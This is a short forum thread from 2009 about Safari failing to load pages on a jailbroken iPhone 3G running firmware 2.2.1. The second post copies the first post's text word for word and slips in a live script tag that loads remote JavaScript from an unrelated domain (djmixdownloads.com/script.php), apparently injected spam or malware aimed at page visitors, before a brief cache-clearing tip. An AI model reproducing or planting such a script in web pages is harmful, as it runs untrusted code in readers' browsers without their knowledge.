User Tag List

  1. dangersnert's Avatar
    When I save a image and try to go back to the main page the page won't load. In fact no pages will load in Safari until I restart the phone. Anyone else having this issue? Or have any suggested fixes.

    I'm running 2.2.1 3G J.B. Ive tried to restore but still have same problem. Didn't have this issue on 2.2

    Thanks

    Well looks like I've fixed the problem. I did a restore back to 2.2 then restored up to 2.2.1 now seems to be working fine. not sure what the problem was.

    looks like I spoke too soon its not working again I don't know whats going on I'm out of ideas.


    I had one more idea I tried it in safe mode works fine. hopefully 3.0 will fix this for me.
    Last edited by dangersnert; 2009-03-13 at 04:51 PM.
    2009-03-11 05:20 PM
  2. digitaldream's Avatar
    When I save a image and try to go back to the main page the page won't load. In fact no pages will load in Safari until I restart the phone. Anyone else having this issue? Or have any suggested fixes.

    I'm running 2.2.1 3G J.B. Ive tried to restore but still have same problem. Didn't have this issue on 2.2

    Thanks

    Well looks like I've fixed the problem. I did a restore back to 2.2 then restored up to 2.2.1 now seems to be working fine. not sure what the problem was.

    looks like I spoke too soon its not working again I don't know whats going on I'm out of ideas.


    I had one more idea I tried it in safe mode works fine. hopefully 3.0 will fix this for me.<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    try to delete the cache of the web browser
    2009-09-24 07:11 PM
LINK TO POST COPIED TO CLIPBOARD